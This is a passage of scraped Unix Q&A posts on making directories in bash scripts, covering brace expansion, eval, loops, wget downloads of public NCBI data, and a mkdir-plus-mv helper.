$elevdir6/0116-ref cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070117*.ref $elevdir7/0117-ref cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070118*.ref $elevdir8/0118-ref cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070119*.ref $elevdir9/0119-ref cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070120*.ref $elevdir10/0120-ref cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070121*.ref $elevdir11/0121-ref cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070122*.ref $elevdir12/0122-ref cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070123*.ref $elevdir13/0123-ref cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070200*.ref $elevdir14/0200-ref cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070201*.ref $elevdir15/0201-ref cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070202*.ref $elevdir16/0202-ref cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070203*.ref $elevdir17/0203-ref cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070204*.ref $elevdir18/0204-ref cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070205*.ref $elevdir19/0205-ref cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070206*.ref $elevdir20/0206-ref cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070207*.ref $elevdir21/0207-ref cp $stddir/aaaaaa-bbbb-cc10-dddd-L1-2020070208*.ref $elevdir22/0208-ref
Sorting long list of files into multiple sub directories based on name
Add the script to root's cronjob: sudo crontab -eYou need to be a sudoer to run the above command. You also will still have to cd to the correct directory inside your script to create your new directory in the right location.
I need to manually create a directory using the following command in a cronjob and not have to enter in a password: sudo mkdir /fold1/I have read that I should not edit /etc/sudoers directly. What are my options?
sudo mkdir in bash script without password
One thing I'll do is use echo to strip unwanted whitespace. In this context, it's important to omit any quotes: LOGDEVICELABEL=FLASHDRIVENAME MD=$(lsblk -I 8 -o label,uuid -n|sed -e '/^$/ d' -e '/^$LOGDEVICELABEL.*$/ d') MD=$(echo $MD) # <-- This line MDLOGDIR=/media/$LOGDEVICELABEL/Log/$MD mkdir $MDLOGDIRThe shell invokes the echo command and supplies it with a series of tokens, and the echo command prints those tokens separated by a space character. This has the effect of (1) skipping leading and trailing whitespace and (2) converting one or more whitespace characters between tokens to a single space. My use of $(...) instead of the back-tick version in this context is equivalent to the back-tick version. Generally I find this version easier to read. It also has the nice benefit that it can be nested ($(...$(...))) where the back-tick version cannot.
I am trying to crate a folder with the label and uuid of a media device plugged in as its name, on another flash drive which I am using to log. I have the following code: LOGDEVICELABEL=FLASHDRIVENAME MD=`lsblk -I 8 -o label,uuid -n|sed -e '/^$/ d' -e '/^$LOGDEVICELABEL.*$/ d'` MDLOGDIR=/media/$LOGDEVICELABEL/Log/$MD mkdir $MDLOGDIRThe problem is that the value pf the variable $MD has a space in the beginning which I cannot get rid of. That space causes mkdir to treat /media/$LOGDEVICELABEL/Log/ and $MDas two separate arguements. I tried: MDLOGDIR=`sed 's/ // g' <<</media/$LOGDEVICELABEL/Log/$MD` Which only removes the space between the UUID and the Label (which is also necessary) but does not remove the space between /media/$LOGDEVICELABEL/Log/ and $MD.
Can't remove space from beginning of variable
Complex bash + wget solution: while read -r d f1 f2; do mkdir -p "$d" && cd "$d" wget --no-verbose -nd -np -r --level=1 "$f1" wget --no-verbose -nd -np -r --level=1 "$f2" cd $OLDPWD done <inputfileDetails:read -r d f1 f2 - read 3 fields from each line from the inputfile into respective variables d(directory name), f1(filepath 1) and f2(filepath 2) mkdir -p "$d" && cd "$d - creating new directory if not exists and change the current working directory to that folder wget --no-verbose -nd -np -r --level=1 "$f1" - download all files on the 1st level of hierarchy (--level=1) from filepath $f1 cd $OLDPWD - back to previous working directoryViewing results: $ tree GSE* GSE11111 ├── filelist.txt ├── GSE11111_RAW.tar └── GSE11111_series_matrix.txt.gz GSE55555 ├── filelist.txt ├── GSE55555_RAW.tar ├── GSE55555_repset.17402833.enrichment.clusters.gff3.gz └── GSE55555_series_matrix.txt.gz0 directories, 7 files
I have a file like this with multiple rows- GSE55555 ftp://ftp.ncbi.nlm.nih.gov/geo/series/GSE55nnn/GSE55555/suppl/* ftp://ftp.ncbi.nlm.nih.gov/geo/series/GSE55nnn/GSE55555/matrix/* GSE11111 ftp://ftp.ncbi.nlm.nih.gov/geo/series/GSE11nnn/GSE11111/suppl/* ftp://ftp.ncbi.nlm.nih.gov/geo/series/GSE11nnn/GSE11111/matrix/*I want to make dir using 1st column and store the downloaded files from 2nd and 3rd column in that directory. How can I go about it in unix?
loop over file and make dir with 1st columns and and wget using the other columns
Yep, in Bash, brace expansion is done as about the very first thing, before expanding variables. Which means that this doesn't work as you want: $ a=1; b=5; echo {$a..$b} {1..5}(The braces are expanded first, giving {$a..$b}, then the variables, giving {1..5}.) But you can do this (if you ever come up with a use for it): $ aa=123;ab=456; echo $a{a,b} 123 456Using eval works, since it forces an additional evaluation pass, but it isn't usually a good idea, since it will evaluate e.g. command expansions and others from filenames containing $ signs, which is usually not what you want. If you have a numeric range, as here, you can use a loop: S=1;E=3; for (( i=$S; i <= $E; i++ )) ; do echo $i doneor: while [ $S -le $E ] ; do echo $S S=$[ $S + 1] done Also, zsh does brace expansion as you wanted: $ zsh -c 'a=1; b=5; echo {$a..$b}' 1 2 3 4 5
Ubuntu 14.04.5 LTS GNU bash, Version 4.3.11(1)-release (x86_64-pc-linux-gnu) mkdir -vp test{1..3}/{a,b,c}works fine mkdir: created directory 'test1' mkdir: created directory 'test1/a' mkdir: created directory 'test1/b' mkdir: created directory 'test1/c' mkdir: created directory 'test2' mkdir: created directory 'test2/a' mkdir: created directory 'test2/b' mkdir: created directory 'test2/c' mkdir: created directory 'test3' mkdir: created directory 'test3/a' mkdir: created directory 'test3/b' mkdir: created directory 'test3/c'S=1;E=3; LANG=EN mkdir -pv test{$S..$E}/{a,b,c}mkdir: created directory 'test{1..3}' mkdir: created directory 'test{1..3}/a' mkdir: created directory 'test{1..3}/b' mkdir: created directory 'test{1..3}/c'seems not to work. unsucessfull was single and double qouting as well. S=1;E=3; LANG=EN mkdir -pv 'test{$S..$E}/{a,b,c}' mkdir: created directory 'test{$S..$E}' mkdir: created directory 'test{$S..$E}/{a,b,c}' S=1;E=3; LANG=EN mkdir -pv 'test{'$S'..'$E'}/{a,b,c}' mkdir: created directory 'test{1..3}' mkdir: created directory 'test{1..3}/{a,b,c}' S=1;E=3; LANG=EN mkdir -pv "test{S1..S3}/{a,b,c}" mkdir: created directory 'test{S1..S3}' mkdir: created directory 'test{S1..S3}/{a,b,c}'i know i can use for loops, have limits with the amount of arguments, possible issues with folders, or use printf or similiar setups as shown in the "Similar Questions" parts. However i rather want to know why this specific case of globbing fails for me. i found a possible solution in a comment on this question Bash script single-quotes parameter with globbing value qouting the user galaxy You can use eval to expand the whole line before executing it, e.g. $out=(eval "grep ..."), however, this works only if your input is trusted. – which makes this S=1;E=3; LANG=EN eval mkdir -pv "test{$S..$E}/{a,b,c}"mkdir: created directory 'test1' mkdir: created directory 'test1/a' mkdir: created directory 'test1/b' mkdir: created directory 'test1/c' mkdir: created directory 'test2' mkdir: created directory 'test2/a' mkdir: created directory 'test2/b' mkdir: created directory 'test2/c' mkdir: created directory 'test3' mkdir: created directory 'test3/a' mkdir: created directory 'test3/b' mkdir: created directory 'test3/c'work.
mkdir with brace expansion seems to fail when variables are used [duplicate]
You will need eval for this. #!/bin/bashstart=1 stop=$1mkdir $(eval echo ex_{$start..$stop})But I agree with don_crissti, why not simply use a loop? Before: ls -p | grep 'ex_' <empty>After I run the script: ./makeDirs.sh 3 ls -p | grep 'ex_' ex_1/ ex_2/ ex_3/Further reading:Why is eval bad? Variables in bash seq replacement ({1..10}) How do I make multiple directories at once in a directory?
I'm trying to make a bash script that would make a series of directories and requesting a parameter of how many directories should be created. $> ./createDir.sh 5$> lsex_01 ex_02 ex_03 ex_04 ex_05I tried using mkdir ex_{01..$1} but it does not seem correct. How could I make this work (without using any loop)?
Creating multiple directories using a parameter in a shell script [duplicate]
Change into the /Volumes/Server1/Craft/2OQ/Dom_Curr/EN directory: cd /Volumes/Server1/Craft/2OQ/Dom_Curr/ENThen run the following: for D in CT_* do mkdir -p ${D}/5Misc/Permissions doneThis will add the subdirectories to every directory in the EN directory that begins with CT_
I have a directory containing several folders with different names, and I need to create a subdirectory in each individual folder. The path for one of the folders looks like this: /Volumes/Server1/Craft/2OQ/Dom_Curr/EN/CT_1 There are multiple CT_xyz (CT_1 through CT_124) folders in the EN directory, and I need to put a subdirectory in each CT folder like this: /Volumes/Server1/Craft/2OQ/Dom_Curr/EN/CT_1/5Misc/Permissions The 5Misc/Permissions folders need to go in each individual folder.
Create a subirectory within multiple directories
You can write a tiny script to do that for you, along these lines (adjust as needed, I'm not sure I got the story right): > cat tst.sh #!/bin/bash for river in amazon niger rhine ; do for name in gfdl hadgem ipsl ; do for count in 1 2 3 4 ; do mkdir ${river}/${name}/${count} cp -a ${river}/${name}/${river}_${name} ${river}/${name}/${count} mv ${river}/${name}/${river}_${name}${count} ${river}/${name}/${count} done done doneBefore running it: > find . | sort . ./amazon ./amazon/gfdl ./amazon/gfdl/amazon_gfdl ./amazon/gfdl/amazon_gfdl1 ./amazon/gfdl/amazon_gfdl2 ./amazon/gfdl/amazon_gfdl3 ./amazon/gfdl/amazon_gfdl4 ./amazon/gfdl/amazon_gfdl5 ...Result: > chmod u+x tst.sh > ./tst.sh > find . | sort . ./amazon ./amazon/gfdl ./amazon/gfdl/1 ./amazon/gfdl/1/amazon_gfdl ./amazon/gfdl/1/amazon_gfdl1 ./amazon/gfdl/2 ./amazon/gfdl/2/amazon_gfdl ./amazon/gfdl/2/amazon_gfdl2 ./amazon/gfdl/3 ./amazon/gfdl/3/amazon_gfdl ./amazon/gfdl/3/amazon_gfdl3 ./amazon/gfdl/4 ./amazon/gfdl/4/amazon_gfdl ./amazon/gfdl/4/amazon_gfdl4 ./amazon/gfdl/amazon_gfdl ./amazon/gfdl/amazon_gfdl5 ...
I have several folders ("amazon", "niger", "rhine",...). Inside each of them I have several subfolders ("gfdl", "hadgem", "ipsl",...). Each subfolders is composed by 5 subfolders (e.g. in "amazon", the subfolder "gfdl" is composed by 5 subfolder 'amazon_gfdl', 'amazon_gfdl1', ..., 'amazon_gfdl5'); and the others subfolders follow the same structure (e.g. in "amazon" subfolder "ipsl" is composed by 5 subfolders 'amazon_ipsl', 'amazon_ipsl1', 'amazon_ipsl2',...until 'amazon_ipsl5'. I have a huge amount of folder following the same frame of organisation. Therefore my question is the following: How can I organise each folder and subfolder in such a way that in each subfolder ("gfdl", "hadgem","ipsl",...), 4 new directories are created ("1", "2", "3", "4"); and then that the folder e.g. "amazon_gfdl" (already present in "gfdl") is copied in each of those new directories and finally that "amazon_gfdl1" is moved to the new directory "1", "amazon_gfdl2" is moved to the new directory "2", and so on! I am currently using the command cp and move within each subfolders but it´s not really efficient and I might need an extra life to end this task like that! Therefor any helps or hint will be greatly appreciated. Thanks you very much!
Folder organization
Your attempt in the question is a fair stab. Here's how I would consider approaching it #!/bin/sh src=$1 dst=$2if [ ! -d "$dst" ] then dir=${dst%/*} # dir path [ "$dir" = "$dst" ] && dir=. # but had no dir mkdir -p "$dir" # create path fi mv "$src" "$dst" # move fileSave this as your mvdir somewhere in your $PATH, and make it executable. It would be possible to extend this script to handle multiple sources but I haven't done that here
I know its a big classical but I didn't found the exact situation that concerns me I need a mkdir+mv command that can be invoked like that : mvdir /home/user/Documents/irs.pdf /mnt/work/45/223/insight/irs1970.pdfExactly like a normal mv command works, just with a creation of path instead of a no such file or directory Considering that work/45/223/insight/ doesn't exist and need to be created All other command that I've found can't be invoked like that, needs some more informations, need to distinguish the path and file ourself, or something Attempt: mkdir -p /mnt/work/45/223/insight && mv /home/user/Documents/irs.pdf /mnt/work/45/223/insight/irs1970.pdf
move and make directory